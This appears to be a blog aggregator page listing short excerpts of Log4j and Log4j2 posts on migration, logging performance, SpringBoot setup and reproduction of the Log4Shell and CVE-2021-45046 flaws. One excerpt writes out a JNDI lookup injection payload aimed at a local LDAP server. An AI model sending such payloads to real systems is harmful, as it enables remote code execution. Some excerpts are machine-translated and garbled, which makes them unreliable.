From Log4j1.x migrates to Log4j2.x

Log4j 1 Stops Official Maintenance Log4j2 earlier. XThe bug that popped out of xhas opened the pan. Some people open their own projects and see that they are using Log4j1.x, breathing instantly. However, to upgrade or upgrade, life has to continue and Log4j has to look forward. As early as 2015, the Apache Software Foundation announced Log4j ...

Posted by KnottyAlder on Mon, 14 Feb 2022 18:36:43 +0100

How to monitor Log4j2 asynchronous logs for writing bottlenecks

How to monitor Log4j2 asynchronous logs for writing bottlenecks In a previous article( A penetrating Log4j2 asynchronous log output blocking problem ), we analyzed the location of a classic Log4j2 asynchronous log blocking problem in detail. The main reason is that the log file is written slowly. It also deeply analyzes the principle of Log4j2 ...

Posted by WolfRage on Sat, 15 Jan 2022 15:15:34 +0100

[Java from 0 to architect] SpringBoot - log processing - SLF4J, Logback, Log4j 2.x

Java from 0 to architect Directory: [Java from 0 to architect] learning record Gitee Code: https://gitee.com/szluyu99/mj_java_frame/tree/master/04_SpringBoot SLF4J supports various frameworks: SLF4J + Log4j 1.x Import dependency: <!-- rely on slf4j-api,log4j 1.x --> <dependency> <groupId>org.slf4j</grou ...

Posted by edwardoka on Sat, 25 Dec 2021 01:36:24 +0100

(cve-2021-45046) log4j2 DOS rce mode reproduction

On December 9, I saw an article on research ideas related to log4j2 DOS vulnerabilities. Unfortunately, I was busy and didn't have time to do it See, most of the log4j2 versions have been upgraded to 2.17 these days. I have squeezed some time to reproduce it Statement: for vulnerability understanding and learning and security reinforcement solu ...

Posted by kidd1270 on Fri, 24 Dec 2021 00:29:51 +0100

[vulnerability] log4j2 remote code execution and actual code reproduction

Vulnerability principle 1. The attack disguises a request body containing JNDI executable services. Here I mainly try LDAP and RMI. The request URL is as follows: LADP: ${jndi:ldap://127.0.0.1:1389/hello}RMI: ${jndi:ldap://127.0.0.1:1389/hello} 2. When the application happens to output the request header or input parameter log, it will ...

Posted by dominod on Sat, 11 Dec 2021 10:13:56 +0100

Spring boot integration log4j2

First, let's talk about why to reference logs: 1. Background introduction Log4j may be the most commonly used log generation dependent jar package. Of course, there are other log generation jar packages, such as log4j2, and so on. South is System.out.print/println, which is our common console printing method. Log4j is an open source project ...

Posted by Jbert2 on Tue, 07 Dec 2021 11:04:37 +0100

Experience gained after being hit many times by performance bottlenecks caused by a large number of online log outputs

Due to the large scale of online services (hundreds of millions of daily requests and hundreds of thousands of daily live users), and the complex logic involved in the business, we use the info level for the online log level, resulting in a very large amount of online logs. We often encounter performance bottlenecks caused by too slow log writi ...

Posted by ttroutmpr on Mon, 01 Nov 2021 09:47:57 +0100